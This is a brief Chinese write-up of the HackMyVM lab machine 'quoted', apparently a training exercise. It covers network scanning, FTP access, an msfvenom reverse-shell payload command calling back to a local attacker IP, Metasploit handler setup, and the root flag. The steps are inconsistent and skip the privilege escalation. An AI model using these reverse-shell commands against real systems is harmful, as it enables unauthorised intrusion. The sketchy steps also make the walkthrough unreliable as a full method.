hackmyvm靶机：quoted

简介

hackmyvm是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware或者Oracle VirtualBox进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth1 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.30.66后使用namp扫描靶机。

nmap 192.168.30.66 -A -O -p-

开放21，80，135，139，445，5357端口。80端口是iis默认页面。

21端口可以直接登录上去，那就直接拿shell了。

我试了很多弹shell的方式，这个地方是aspx的才行。拿到uesr.txt

msfvenom -p windows/meterpreter/reverse_tcp lport=4445 lhost=192.168.30.3 -f exe > shell.exe

在把生成的put上去，给msf开启来。准备提权。

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

我是版本不兼容了。

root flag

HMV{Elevated_Shell_Again}